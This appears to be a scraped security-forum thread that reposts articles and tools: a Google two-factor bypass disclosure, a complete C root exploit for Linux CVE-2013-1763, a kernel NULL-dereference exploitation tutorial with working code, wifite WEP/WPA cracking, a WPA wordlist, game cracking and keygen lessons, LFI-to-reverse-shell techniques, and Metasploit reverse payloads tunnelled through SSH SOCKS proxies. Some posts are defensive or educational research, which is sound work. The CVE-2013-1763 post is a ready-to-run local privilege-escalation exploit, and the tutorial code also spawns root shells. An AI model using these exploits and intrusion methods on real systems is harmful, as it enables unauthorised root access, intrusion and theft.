Unfortunately, this sort of “user education” program is something that rarely works well in practice (and might not even make economic sense). However, even with all-powerful ASPs, Google’s 2-step verification system should mitigate both of these types of attacks, even if users continue to do “stupid” things. Application-Specific Passwords are generated by Google, and not intended for users to memorize, so it’s extremely unlikely that a user might share one with other websites. Similarly, if a phishing site demanded users submit an Application-Specific Password, we imagine its success rate would be far lower (perhaps orders of magnitude lower) than normal. That said, all-powerful ASPs still carry some serious potential for harm. If an attacker can trick a user into running some malware, that malware might be able to find and extract an ASP somewhere on that user’s system (for example, Pidgin, a popular chat client often used with Google Talk, stores passwords in plaintext in an XML file). In addition, thick-client applications, the primary consumer of ASPs, are rather notorious for poor SSL certificate verification, potentially allowing ASPs to be captured on the wire via MITM attacks. Google’s fix helps this situation significantly. Though a compromised ASP could still inflict significant harm on a user, that user should ultimately retain control over his account (and the ability to revoke the ASP at the first sign something has gone wrong). However, we’re strong believers in the principle of least privilege, and we’d love to see Google implement some means to further-restrict the privileges of individual ASPs. Disclosure Timeline 2012/07/16: Duo researchers confirm presence of ASP weakness. 2012/07/18: Issue reported to security@google.com. 2012/07/20: Communication with Google Security Team clarifying the issue. 2012/07/24: Issue is confirmed and deemed “expected behavior” by Google Security Team. 2013/02/21: Fix is pushed by Google to prevent ASP-initiated sessions from accessing sensitive account interfaces. 2013/02/25: Public disclosure by Duo. P.S. Inspired to enable two-factor authentication with your Google account? No need to download yet another app. We recently added third-party account support to Duo Mobile so now your work and personal accounts can all live in one place! Sursa: https://blog.duosecurity.com/2013/02/bypassing-googles-two-factor-authentication/
  11. CVE-2013-1763 SOCK_DIAG netlink Linux kernel 3.3-3.8 exploit /* * quick'n'dirty poc for CVE-2013-1763 SOCK_DIAG bug in kernel 3.3-3.8 * bug found by Spender * poc by SynQ * * hard-coded for 3.5.0-17-generic #28-Ubuntu SMP Tue Oct 9 19:32:08 UTC 2012 i686 i686 i686 GNU/Linux * using nl_table->hash.rehash_time, index 81 * * Fedora 18 support added * * 2/2013 */ #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <netinet/tcp.h> #include <errno.h> #include <linux/if.h> #include <linux/filter.h> #include <string.h> #include <stdio.h> #include <stdlib.h> #include <linux/sock_diag.h> #include <linux/inet_diag.h> #include <linux/unix_diag.h> #include <sys/mman.h> typedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); typedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); _commit_creds commit_creds; _prepare_kernel_cred prepare_kernel_cred; unsigned long sock_diag_handlers, nl_table; int __attribute__((regparm(3))) kernel_code() { commit_creds(prepare_kernel_cred(0)); return -1; } int jump_payload_not_used(void *skb, void *nlh) { asm volatile ( "mov $kernel_code, %eax\n" "call *%eax\n" ); } unsigned long get_symbol(char *name) { FILE *f; unsigned long addr; char dummy, sym[512]; int ret = 0; f = fopen("/proc/kallsyms", "r"); if (!f) { return 0; } while (ret != EOF) { ret = fscanf(f, "%p %c %s\n", (void **) &addr, &dummy, sym); if (ret == 0) { fscanf(f, "%s\n", sym); continue; } if (!strcmp(name, sym)) { printf("[+] resolved symbol %s to %p\n", name, (void *) addr); fclose(f); return addr; } } fclose(f); return 0; } int main(int argc, char*argv[]) { int fd; unsigned family; struct { struct nlmsghdr nlh; struct unix_diag_req r; } req; char buf[8192]; if ((fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SOCK_DIAG)) < 0){ printf("Can't create sock diag socket\n"); return -1; } memset(&req, 0, sizeof(req)); req.nlh.nlmsg_len = sizeof(req); req.nlh.nlmsg_type = SOCK_DIAG_BY_FAMILY; req.nlh.nlmsg_flags = NLM_F_ROOT|NLM_F_MATCH|NLM_F_REQUEST; req.nlh.nlmsg_seq = 123456; //req.r.sdiag_family = 89; req.r.udiag_states = -1; req.r.udiag_show = UDIAG_SHOW_NAME | UDIAG_SHOW_PEER | UDIAG_SHOW_RQLEN; if(argc==1){ printf("Run: %s Fedora|Ubuntu\n",argv[0]); return 0; } else if(strcmp(argv[1],"Fedora")==0){ commit_creds = (_commit_creds) get_symbol("commit_creds"); prepare_kernel_cred = (_prepare_kernel_cred) get_symbol("prepare_kernel_cred"); sock_diag_handlers = get_symbol("sock_diag_handlers"); nl_table = get_symbol("nl_table"); if(!prepare_kernel_cred || !commit_creds || !sock_diag_handlers || !nl_table){ printf("some symbols are not available!\n"); exit(1); } family = (nl_table - sock_diag_handlers) / 4; printf("family=%d\n",family); req.r.sdiag_family = family; if(family>255){ printf("nl_table is too far!\n"); exit(1); } } else if(strcmp(argv[1],"Ubuntu")==0){ commit_creds = (_commit_creds) 0xc106bc60; prepare_kernel_cred = (_prepare_kernel_cred) 0xc106bea0; req.r.sdiag_family = 81; } unsigned long mmap_start, mmap_size; mmap_start = 0x10000; mmap_size = 0x120000; printf("mmapping at 0x%lx, size = 0x%lx\n", mmap_start, mmap_size); if (mmap((void*)mmap_start, mmap_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) == MAP_FAILED) { printf("mmap fault\n"); exit(1); } memset((void*)mmap_start, 0x90, mmap_size); char jump[] = "\x55\x89\xe5\xb8\x11\x11\x11\x11\xff\xd0\x5d\xc3"; // jump_payload in asm unsigned long *asd = &jump[4]; *asd = (unsigned long)kernel_code; memcpy( (void*)mmap_start+mmap_size-sizeof(jump), jump, sizeof(jump)); if ( send(fd, &req, sizeof(req), 0) < 0) { printf("bad send\n"); close(fd); return -1; } printf("uid=%d, euid=%d\n",getuid(), geteuid() ); if(!getuid()) system("/bin/sh"); } Sursa si info: https://rdot.org/forum/showthread.php?p=30828
  12. Astia de la Oracle/Java sunt chiar ratati. E exact aceeasi metoda folosita la inca 70 de exploit-uri.
  13. [TABLE] [TR] [TD][TABLE=width: 100%] [TR] [TD=align: center] [/TD] [TD=align: justify] Instant PDF Password Remover is the FREE tool to instantly remove Password of protected PDF document. It can remove both User & Owner password along with all PDF file restrictions such as Copy, Printing, Screen Reader etc. [/TD] [/TR] [/TABLE] [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: justify]Often we receive password protected PDF documents in the form of mobile bills, bank statements or other financial reports. It is highly inconvenient to remember or type these complex and long passwords. 'Instant PDF Password Remover'helps you to quickly remove the Password from these PDF documents. Thus preventing the need to type these complex/long password every time you open such protected PDF documents. Note that it cannot help you to remove the unknown password. It will only help you to remove the KNOWN password so that you don't have to enter the password everytime while opening the PDF file. It makes it even easier with the 'Right Click Context Menu' integration. This allows you to simply right click on the PDF file and launch the tool. Also you can Drag & Drop PDF file directly onto the GUI window to start the password removal operation instantly. It can unlock PDF document protected with all versions of Adobe Acrobat Reader using different (RC4, AES) encryption methods. It comes with Installer for quick installation/un-installation. It works on wide range of Operating systems starting from Windows XP to Windows 8. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]Features [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD] Instantly remove password of PDF document Support for PDF documents protected by all versions of Adobe Acrobat Reader Supports Standard RC4 (40-bit,128-bit), AES (128 bit, 256 bit) encryption Removes PDF User or Document Open passsword Removes PDF Owner Password Remove all the following Restrictions from PDF document Copying Printing Signing Commenting Changing the Document Document Assembly Page Extraction Filling of Form Fields [*] Right click Context Menu to quickly select & remove the PDF Password [*] Drag & Drop support for easier selection of PDF file. [*]Very easy to use with simple & attractive GUI screen [*] Open PDF file on successful removal of password [*] Support for local Installation and uninstallation of the software. [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD] [/TD] [/TR] [TR] [TD=class: page_subheader]PDF Password Secrets [/TD] [/TR] [TR] [TD][/TD] [/TR] [TR] [TD=align: justify]A protected PDF Document may have 2 kind of Passwords. User Password & Owner Password. User Password: It is also called as Document Open Password. It is required to open the protected or secure PDF file. Owner Password: Owner password is protect the restrictions imposed on the PDF file. Owner of PDF file may impose restrictions such as Copying, Printing, Signing, Editing etc. These restrictions are protected with so called Owner Password so that no one else can change it. Generally utility bills, bank & other financial documents are protected with User Password. In such case you can just enter this 'User Password' and open the document. Some times certain sensitive documents are protected with both user & owner password. In such cases you need to enter 'Owner Password' in 'Instant PDF Password Remover' to remove the password & all other restrictions. [/TD] [/TR] [/TABLE] Download: http://securityxploded.com/download.php#instantpdfpasswordremover More info: Instant PDF Password Remover: Free PDF Password & Restrictions Removal Tool
  14. [h=3]Much ado about NULL: Exploiting a kernel NULL dereference[/h][h=4]By nelhage on Apr 12, 2010[/h] Last time, we took a brief look at virtual memory and what a NULL pointer really means, as well as how we can use the mmap(2) function to map the NULL page so that we can safely use a NULL pointer. We think that it's important for developers and system administrators to be more knowledgeable about the attacks that black hats regularly use to take control of systems, and so, today, we're going to start from where we left off and go all the way to a working exploit for a NULL pointer dereference in a toy kernel module. A quick note: For the sake of simplicity, concreteness, and conciseness, this post, as well as the previous one, assumes Intel x86 hardware throughout. Most of the discussion should be applicable elsewhere, but I don't promise any of the details are the same. [h=3]nullderef.ko[/h] In order to allow you play along at home, I've prepared a trivial kernel module that will deliberately cause a NULL pointer derefence, so that you don't have to find a new exploit or run a known buggy kernel to get a NULL dereference to play with. I'd encourage you to download the source and follow along at home. If you're not familiar with building kernel modules, there are simple directions in the README. The module should work on just about any Linux kernel since 2.6.11. Don't run this on a machine you care about – it's deliberately buggy code, and will easily crash or destabilize the entire machine. If you want to follow along, I recommend spinning up a virtual machine for testing. While we'll be using this test module for demonstration, a real exploit would instead be based on a NULL pointer dereference somewhere in the core kernel (such as last year's sock_sendpage vulnerability), which would allow an attacker to trigger a NULL pointer dereference -- much like the one this toy module triggers -- without having to load a module of their own or be root. If we build and load the nullderef module, and execute echo 1 > /sys/kernel/debug/nullderef/null_read our shell will crash, and we'll see something like the following on the console (on a physical console, out a serial port, or in dmesg): BUG: unable to handle kernel NULL pointer dereference at 00000000 IP: [<c5821001>] null_read_write+0x1/0x10 [nullderef] [h=3]The kernel address space[/h] e We saw last time that we can map the NULL page in our own application. How does this help us with kernel NULL dereferences? Surely, if every application has its own address space and set of addresses, the core operating system itself must also have its own address space, where it and all of its code and data live, and mere user programs can't mess with it? For various reasons, that that's not quite how it works. It turns out that switching between address spaces is relatively expensive, and so to save on switching address spaces, the kernel is actually mapped into every process's address space, and the kernel just runs in the address space of whichever process was last executing. In order to prevent any random program from scribbling all over the kernel, the operating system makes use of a feature of the x86's virtual memory architecture called memory protection. At any moment, the processor knows whether it is executing code in user (unprivileged) mode or in kernel mode. In addition, every page in the virtual memory layout has a flag on it that specifies whether or not user code is allowed to access it. The OS can thus arrange things so that program code only ever runs in "user" mode, and configures virtual memory so that only code executing in "kernel" mode is allowed to read or write certain addresses. For instance, on most 32-bit Linux machines, in any process, the address 0xc0100000 refers to the start of the kernel's memory – but normal user code is not allowed to read or write it. A diagram of virtual memory and memory protection Since we have to prevent user code from arbitrarily changing privilege levels, how do we get into kernel mode? The answer is that there are a set of entry points in the kernel that expect to be callable from unprivileged code. The kernel registers these with the hardware, and the hardware has instructions that both switch to one of these entry points, and change to kernel mode. For our purposes, the most relevant entry point is the system call handler. System calls are how programs ask the kernel to do things for them. For example, if a programs want to write from a file, it prepares a file descriptor referring to the file and a buffer containing the data to write. It places them in a specified location (usually in certain registers), along with the number referring to the write(2) system call, and then it triggers one of those entry points. The system call handler in the kernel then decodes the argument, does the write, and return to the calling program. This all has at least two important consequence for exploiting NULL pointer dereferences: First, since the kernel runs in the address space of a userspace process, we can map a page at NULL and control what data a NULL pointer dereference in the kernel sees, just like we could for our own process! Secondly, if we do somehow manage to get code executing in kernel mode, we don't need to do any trickery at all to get at the kernel's data structures. They're all there in our address space, protected only by the fact that we're not normally able to run code in kernel mode. We can demonstrate the first fact with the following program, which writes to the null_read file to force a kernel NULL dereference, but with the NULL page mapped, so that nothing goes wrong: (As in part I, you'll need to echo 0 > /proc/sys/vm/mmap_min_addr as root before trying this on any recent distribution's kernel. While mmap_min_addr does provide some protection against these exploits, attackers have in the past found numerous ways around this restriction. In a real exploit, an attacker would use one of those or find a new one, but for demonstration purposes it's easier to just turn it off as root.) #include <sys/mman.h> #include <stdio.h> #include <fcntl.h> int main() { mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0); int fd = open("/sys/kernel/debug/nullderef/null_read", O_WRONLY); write(fd, "1", 1); close(fd); printf("Triggered a kernel NULL pointer dereference!\n"); return 0; } Writing to that file will trigger a NULL pointer dereference by the nullderef kernel module, but because it runs in the same address space as the user process, the read proceeds fine and nothing goes wrong – no kernel oops. We've passed the first step to a working exploit. [h=3]Putting it together[/h] To put it all together, we'll use the other file that nullderef exports, null_call. Writing to that file causes the module to read a function pointer from address 0, and then call through it. Since the Linux kernel uses function pointers essentially everywhere throughout its source, it's quite common that a NULL pointer dereference is, or can be easily turned into, a NULL function pointer dereference, so this is not totally unrealistic. So, if we just drop a function pointer of our own at address 0, the kernel will call that function pointer in kernel mode, and suddenly we're executing our code in kernel mode, and we can do whatever we want to kernel memory. We could do anything we want with this access, but for now, we'll stick to just getting root privileges. In order to do so, we'll make use of two built-in kernel functions, prepare_kernel_cred and commit_creds. (We'll get their addresses out of the /proc/kallsyms file, which, as its name suggests, lists all kernel symbols with their addresses) struct cred is the basic unit of "credentials" that the kernel uses to keep track of what permissions a process has – what user it's running as, what groups it's in, any extra credentials it's been granted, and so on. prepare_kernel_cred will allocate and return a new struct cred with full privileges, intended for use by in-kernel daemons. commit_cred will then take the provided struct cred, and apply it to the current process, thereby giving us full permissions. Putting it together, we get: #include <sys/mman.h> #include <stdio.h> #include <stdlib.h> #include <fcntl.h> struct cred; struct task_struct; typedef struct cred *(*prepare_kernel_cred_t)(struct task_struct *daemon) __attribute__((regparm(3))); typedef int (*commit_creds_t)(struct cred *new) __attribute__((regparm(3))); prepare_kernel_cred_t prepare_kernel_cred; commit_creds_t commit_creds; /* Find a kernel symbol in /proc/kallsyms */ void *get_ksym(char *name) { FILE *f = fopen("/proc/kallsyms", "rb"); char c, sym[512]; void *addr; int ret; while(fscanf(f, "%p %c %s\n", &addr, &c, sym) > 0) if (!strcmp(sym, name)) return addr; return NULL; } /* This function will be executed in kernel mode. */ void get_root(void) { commit_creds(prepare_kernel_cred(0)); } int main() { prepare_kernel_cred = get_ksym("prepare_kernel_cred"); commit_creds = get_ksym("commit_creds"); if (!(prepare_kernel_cred && commit_creds)) { fprintf(stderr, "Kernel symbols not found. " "Is your kernel older than 2.6.29?\n"); } /* Put a pointer to our function at NULL */ mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS|MAP_FIXED, -1, 0); void (**fn)(void) = NULL; *fn = get_root; /* Trigger the kernel */ int fd = open("/sys/kernel/debug/nullderef/null_call", O_WRONLY); write(fd, "1", 1); close(fd); if (getuid() == 0) { char *argv[] = {"/bin/sh", NULL}; execve("/bin/sh", argv, NULL); } fprintf(stderr, "Something went wrong?\n"); return 1; } (struct cred is new as of kernel 2.6.29, so for older kernels, you'll need to use this this version, which uses an old trick based on pattern-matching to find the location of the current process's user id. Drop me an email or ask in a comment if you're curious about the details.) So, that's really all there is. A "production-strength" exploit might add lots of bells and whistles, but, there'd be nothing fundamentally different. mmap_min_addr offers some protection, but crackers and security researchers have found ways around it many times before. It's possible the kernel developers have fixed it for good this time, but I wouldn't bet on it. ~nelhage One last note: Nothing in this post is a new technique or news to exploit authors. Every technique described here has been in active use for years. This post is intended to educate developers and system administrators about the attacks that are in regular use in the wild. Sursa: https://blogs.oracle.com/ksplice/entry/much_ado_about_null_exploiting1
  15. Eu l-am mutat. Iti dadeam si warn dar mi-a fost lene. Categoria aceasta este pentru sugestiile PENTRU FORUM, nu pentru voi. In descrierea categoriei apare: "Vreti un forum mai bun? Orice sugestie din partea voastra va fi analizata. Doar sugestii pentru site/forum."
  16. [h=2]Mitigating Null Pointer Exploitation on Windows[/h]Posted by Tarjei Mandt on July 7, 2011 As part of a small research project, I recently looked into how exploitation of null pointer vulnerabilities could be mitigated on Windows. The problem with many of the recent vulnerabilities affecting Windows kernel components is that a large number of these issues can be exploited provided that the attacker maps and controls the contents of the null page. As many of you probably know, Windows allows non-privileged users to map the null page through functions such as NtAllocateVirtualMemory or NtMapViewOfFile. Although there are multiple ways to approach the problem, the solution proposed relies on manipulation of virtual address descriptors (VADs) using a kernel-mode driver. As VADs are used to implement the PAGE_NOACCESS protection in Windows and contain special properties to secure address ranges in process memory, they can be used to deny null page access in both user and kernel space. The following paper details the proposed mitigation and suggests a possible implementation. Locking Down the Windows Kernel: Mitigating Null Pointer Exploitation [PDF] Abstract. One of the most prevalent bug classes affecting Windows kernel components today is undeniably NULL pointer dereferences. Unlike other platforms such as Linux, Windows (in staying true to backwards compatibility) allows non-privileged users to map the null page within the context of a user process. As kernel and user-mode components share the same virtual address space, an attacker may potentially be able to exploit kernel null dereference vulnerabilities by controlling the dereferenced data. In this paper, we propose a way to generically mitigate NULL pointer exploitation on Windows by restricting access to the lower portion of process memory using VAD manipulation. Importantly, as the proposed method employs features already present in the memory manager and does not introduce any offending hooks, it can be introduced on a wide range of Windows platforms. Additionally, because the mitigation only introduces minor changes at process creation-time, the performance cost is minimal. Sursa: Mitigating Null Pointer Exploitation on Windows | !pool @eax
  17. [h=2]Windows Hooks of Death: Kernel Attacks through User-Mode Callbacks[/h] Posted by Tarjei Mandt on August 11, 2011 At Black Hat USA 2011, I presented the research that lead up to the 44 vulnerabilities addressed in MS11-034 and MS11-054. These vulnerabilities were indirectly introduced by the user-mode callback mechanism which win32k relies upon to interact with data stored in user-mode as well as provide applications the ability to instantiate windows and event hooks. In invoking a user-mode callback, win32k releases the global lock it aquires whenever making updates to data structures and objects managed by the Window Manager (USER). In doing so, applications are free to modify the state of management structures as well as user objects by invoking system calls from within the callback itself. Thus, upon returning from a user-mode callback, win32k must perform extensive validation in order to make sure that any changes are accounted for. Failing to properly validate such changes could result in vulnerabilities such as null-pointer derferences and use-after-frees. The slide deck for the Black Hat presentation as well as the accompanied whitepaper, outlines several of the vulnerabilities that may arise from the lack of user-mode callback validation. In particular, we look at the importance of user object locking, validating object and data structure state changes, and ensuring that reallocatable buffers are sufficiently validated. In order to assess the severity of the mentioned vulnerabilities, we also investigate their exploitability and with that, show how an attacker very easily (e.g. using kernel pool or heap manipulation) could obtain arbitrary kernel code execution. Finally, because vulnerability classes such as use-after-frees and null-pointer dereferences have been (and still are?) extremely prevalent in win32k, we conclude by evaluating ways to mitigate their exploitability. In retrospect, Black Hat USA and DEFCON stands out as one of those great conferences where you get to meet many interesting people and can run into just about anyone. Having spent what now seems like a lifetime in win32k (ok, I may be loosely exaggerating…), meeting one of the past developers of the Window Manager whose code I had torn to pieces (sorry!), was one of those great moments that will be remembered for years to come. I also want to use this occasion to extend my gratitude and thanks to everybody that showed up for my talk. Your feedback is highly appreciated, and I would probably not have been doing this if it wasn’t for you guys. See you on the flipside! Kernel Attacks through User-Mode Callbacks: Slides Kernel Attacks through User-Mode Callbacks: Whitepaper Sursa: Windows Hooks of Death: Kernel Attacks through User-Mode Callbacks | !pool @eax
  18. [h=3]wifite r.68 - WEP/WPA Password Cracker for BT4[/h]Features: * this project is available in French: all thanks goto Matt² for his excellent translation! * sorts targets by power (in dB); cracks closest access points first * automatically deauths clients of hidden networks to decloak SSIDs * numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc) * customizable settings (timeouts, packets/sec, channel, change mac address, ignore fake-auth, etc) * "anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete * all WPA handshakes are backed up to wifite.py's current directory * smart WPA deauthentication -- cycles between all clients and broadcast deauths * stop any attack with Ctrl+C -- options: continue, move onto next target, skip to cracking, or exit * switching WEP attack methods does not reset IVs * intel 4965 chipset fake-authentication support; uses wpa_supplicant workaround * SKA support (untested) * displays session summary at exit; shows any cracked keys * all passwords saved to log.txt * built-in updater: ./wifite.py -upgrade Download: wifite download Source: wifite - automated wireless auditor - Google Project Hosting Sursa: Password Cracker | MD5 Cracker | Wordlist Download: wifite r.68 - WEP/WPA Password Cracker for BT4
  19. [h=3]WPA Wordlist Download - 13GB[/h]Looks like my wordlists got compiled into a large collection of wpa wordlists for download - well worth the bandwidth. =) Since it's a wpa wordlist, everything below 8 chars long was removed, which is bad for other practical uses - unless you bruteforce everything to the length of 8. Please note that i did not create this wpa wordlist torrent. Download (torrent): WPA Wordlist - 13GB More wordlists (not just for wpa) can be found here: More wordlist downloads Sursa: Password Cracker | MD5 Cracker | Wordlist Download: WPA Wordlist Download - 13GB
  20. Assembly Language Tutorial Please choose a tutorial page: Fundamentals -- Information about C Tools Registers Simple Instructions Example 1 -- SC CDKey Initial Verification Example 2 -- SC CDKey Shuffle Example 2b -- SC CDKey Final Decode The Stack Stack Example [*] Functions [*] Example 3 -- Storm.dll SStrChr [*] Assembly Summary Machine Code Example 4 -- Smashing the Stack Cracking a Game Example 5 -- Cracking a game Example 6 -- Writing a keygen .dll Injection and Patching Memory Searching Example 7 -- Writing a cheat for Starcraft (1.05) Example 7 Step 1 -- Displaying Messages Example 7 Step 1b -- Above, w/ func ptrs Example 7 Final [*] Example 8 -- Getting IX86.dll files [*] 16-bit Assembly [*] Example 9 -- Keygen for a 16-bit game [*] Example 10 -- Writing a loader Tutorial: http://www.skullsecurity.org/wiki/index.php/Fundamentals
  21. From web app LFI to shell spawn Web application LFI (Local File Inclusion) vulnerabilities are regularly underestimated both by penetration testers and developers. Despite the main threat of exposing critical system information contained at core files (such as “/etc/passwd“, “/boot.ini” and “/etc/issue“), LFI vulnerabilities may cause bigger problems to the victim server. Based on the source code that introduces a LFI vulnerability and under certain server configuration scenarios, the attacker may be able to run server side code and establish a reverse connection or a pseudo-shell over HTTP with the victim server. During the rest of the article an LFI vulnerability on a known E-Commerce CMS will be examined in a try to execute server side code and spawn a reverse shell. It is a common feature for web applications to implement file inclusion functionalities in order to dynamically change website’s content presented to users. The arguments to those file inclusion functions are regularly specified by the user under specially crafted parameters. LFI vulnerabilities are created due to improper input sanitization/validation for those user specified parameters. File inclusion functions are implemented using either include (or require) directives or any of the available file handle functions (fread, file_get_contents etc.). In case of file handle functions there aren’t many things to do because every imported file is processed as string. Although if an include directive is used, it is possible to execute server side code contained in the imported file. For more details about PHP import directives, you can referrer to include and require PHP manuals. The real challenge now is to find a way to store server side code into a file that is readable from the web service running user (www-data, wwwrun etc). This is not an easy task and might be even impossible under some server configuration setups. In this article two main methods are examined: 1) Web log poison and 2) World readable file upload (via anonymous FTP). For the article purposes a Debian pwnbox VM has been established implementing a vulnerable version of the osCSS2 E-Commerce CMS. The target web application was a random selection from the exploit-db archive. The vulnerable osCSS2 version and the LFI vulnerability details are available here. The CMS is written in PHP and is served from a running Apache web service. Consequently the following analysis focus on PHP + Apache system setup. 1) Web log poison Web log poison technique is effective when web service’s log files are readable by the user that PHP (or any other server side code) is running. Usually sysadmins choose the performance optimized (and easy to implement) way to run PHP as an Apache module. Consequently PHP is running under Apache user. Usually the default Apache setups limit the access to web logs only to root and administrator users and groups making the logs unaccessible for the web service user. Although, there exist many shared host services and misconfigured systems that serve readable web logs. To confirm that web logs are readable, the target server must be initially enumerated in order to locate the correct paths. In this case study the target system is known to be a Debian setup, so the web log paths are known too. For verification purposes GET requests can be executed to confirm read access. Many of you might wonder at this point why web logs are so important in LFI exploitation. The answer is pretty clear. Web logs’ content is defined mainly by the user interaction with the server. Web logs store user information, such as source IP, requested web path, refer URL, user agent, cookies etc. Let’s take for example the user agent field which stores information about the user’s broswer and system. If the attacker changes the default string used by the broswing application to a valid PHP code, this code will be stored in the Apache access log. Then by including the access log using the LFI vulnerability the PHP code is executed at the server side. In the following example the curl tool is used to poison the logs with PHP code (just calling the phpinfo() function). Instead of curl you can use famous plugins/addons for your web broswer or a third proxy tool (such as ZAP or Burp). Knowing now how server side code can be executed, a PHP system function can used to call external programs and spawn the reverse shell. 2) File upload via anonymous FTP During the target enumeration phase, service scanning has revealed a running ProFTPD service at port 21 allowing anonymous FTP logins with file upload permissions. By digging into application’s packages and default configurations, pentesters can gather useful information about possible system setups. Following this approach and with some experiments the store path for the uploaded files can be discovered. For the following case study, the anonymous file upload path is ‘/home/ftp‘. Initially the file containing the PHP code for the reverse connection is uploaded to the target server. After successfully enumerating the path for the anonymous FTP uploads, the ‘backdoor.php‘ file is included spawning the reverse shell. The above two methods are a small sample of the available techniques for storing tiny server side code chunks to readable files in the remote server. After detail enumeration of the target system, penetration testers can discover various other possible store points such as log files from third applications. The system and service enumeration process is vital for the attacks success. Penetration testers must carefully search for various existing protection directives/configurations (such as PHP open_basedir config) that might block such an attack. DISCLAIMER:I’m not responsible with what you do with this info. This information is for educational purposes only. A. Bechtsoudis Sursa: https://bechtsoudis.com/hacking/from-web-app-lfi-to-shell-spawn/
  22. Using SSH Socks Proxies with MSF Reverse TCP Payloads Regularly pentesters need to redirect their network traffic through various proxy hosts to access private network subnets, bypass firewall restrictions or hide their traces. Identifying those needs, professionals have armored their tool arsenal with various tunneling and forwarding tools in order to work efficiently under various network architectures and testing cases. Each working case strongly depends on the proxy host’s running services and obtained access level to those services. One of my favorite cases (and I believe to many others too) is the OpenSSH Socks Proxy scenario. Remote SSH access to the proxy host is available offering flexible ways to redirect network traffic via the SSH channel. However, there exist a main drawback in the Socks Proxy case, you “can’t” use the available reverse TCP payloads delivered with the Metasploit framework (and any other similar tools). Actually, this is not 100% true. There exist some OpenSSH forward features that can be used/combined to bypass this restriction. Many of you might say that there exist many alternatives to TCP reverse payloads such as PHP, Java, HTTP, DNS etc. That’s true, although many of them are application specific and are not fully stable under certain circumstances. Additionally, these alternatives might not be always applicable due to some exploitation restrictions. Some others might also say that Metasploit’s meterpreter pivot features (framework routes + port forward) can be used to redirect traffic through the proxy host, avoiding Socks usage. The drawback in this case is that if the proxy host is a linux box the matching meterpreter payload is not stable enough (at least it wasn’t when this post was written). Now that you have been convinced that under certain circumstances the Socks proxy is the only stable option, lets see how we can deal with the reverse TCP restrictions. When a reverse TCP payload is used, the victim host tries to connect back to the requestor’s source IP address. If SSH Socks proxy is used the source IP address from the victim’s perspective is the proxy’s IP address. Consequently, the reverse TCP payload will try to connect back to the proxy and not to the attacker’s address. The Metasploit framework successfully identifies this problem and raises an error exception when a socks proxy is used with a reverse TCP payload. The main concept to bypass this restriction is to use a forwarding mechanism in the proxy to deliver the network packets to the correct addresses when a reverse connection reaches the proxy. The presented methods are feasible when the following requirements are met: Available remote SSH access to the proxy host (single user or root, each case is analyzed separately) Proxy host has at least one unused firewall incoming (from the victim) allowed port Proxy host can access the target host For the rest of the article the following network topology will be used for the examine cases: Initially lets establish the SSH Socks proxy with the pivot host and test the socks proxy connectivity via the proxychains tool: The SSH socks proxy works and we can use it to access the victim host: Now if we try to use the Socks proxy with a reverse TCP payload, Metasploit raises an exception: OpenSSH port forward features can help us to bypass this restriction. Two cases will be examined according to the access level that the attacker has on the proxy host: Root Access: Modify OpenSSH configuration and use the remote port forward feature Single User Access: Use OpenSSH local port forward mechanism by establishing a second SSH channel For those not familiar with local & remote SSH port forward features you can refer to the end references. Before continuing lets disable metasploit’s reverse TCP socks proxy check to confirm both test cases under the framework. Lucky for us framework’s modular architecture makes such code hacks easy to implement. So just comment lines 68-70 at “lib/msf/core/handler/reverse_tcp.rb“ 1. Root Access to Proxy Host OpenSSH remote port forwarding feature is used to redirect incoming traffic to port 4444 on proxy host to port 53 on the attacker. As the OpenSSH manuals mentions, by default remote port forwarding will bind the proxy port (4444 in our case) on the localhost address. Binding to localhost will block victim incoming connections. So we need root access to modify the sshd configuration and enable GatewayPorts option. When the payload is triggered the network paths are as follow: Before proceeding to the framework usage lets check with some simple netcat connection that the setup works: If instead of the attacker’s IP address you use the localhost address, the forward channel will work like a charm (actually this is the correct approach), although metasploit’s session manager will fail to identify the connection and will crash. Some tcpdump debugging might help at this point to clarify how this forwarders and port binds work. Having confirmed that our proxy forwarder works lets proceed to the framework. A linux x86 reverse TCP stagged shell payload has been generated and uploaded to the victim host. To trigger the payload a relative PHP script has been placed at the web path. The tricky part while generating the payload is to use as LHOST the proxy’s IP address and as LPORT the port (4444 in this example) that is forwarded to the attacker by the proxy. Finally lets trigger the payload via a custom auxiliary module (a single GET request) and establish the reverse connection through the socks proxy: 2. Single User Access to Proxy Host Single user access to the proxy host means that we can’t set the GatewayPorts option at the SSHD configuration. So we need to find an alternative way to implement the forwarder. This time OpenSSH local port forward feature (-L) is used under a second SSH connection to localhost at the proxy host. The -g flag is used to bind the socket at 0.0.0.0 allowing incoming connections apart from localhost. Consequently the reverse connection path is as follow: The usual netcat tests before proceeding to the framework: And finally the socks proxy is also successfully working with reverse TCP payloads under the framework: Here are all the above screenshots in a slide gallery: Mission accomplished! We have managed to use reverse TCP payloads under SSH Socks proxies taking advantage of the various OpenSSH features. Of course someone might implement the port forwarding at the proxy host with various other ways (iptables, 3rd party tools etc). The OpenSSH way was chosen because it is already available in the SSH Socks proxy scenario and regularly pass undetected from the sysadmins, while a third party tool might trigger some alerts (of course iptables isn’t feasible in a single user access level case). It would be ideal if the above concept can be somehow implemented in the metasploit framework, making reverse TCP payloads available under certain socks proxy scenarios. References: LiNUX Horizon - SSH Port Forwarding (SSH Tunneling) Howto use SSH local and remote port forwarding http://www.metasploit.com Metasploit: Metasploit through Proxy Meterpreter Basics - Metasploit Unleashed Pivoting - Metasploit Unleashed —{ Update 11 June 2012 }— Proxy’s port forwarding back to the attacker can be also easily implemented with netcat. Be careful while using the netcat approach at its plaintext connections might trigger IDS/IPS rulesets. For stealthier communications try to establish an encrypted channel with the 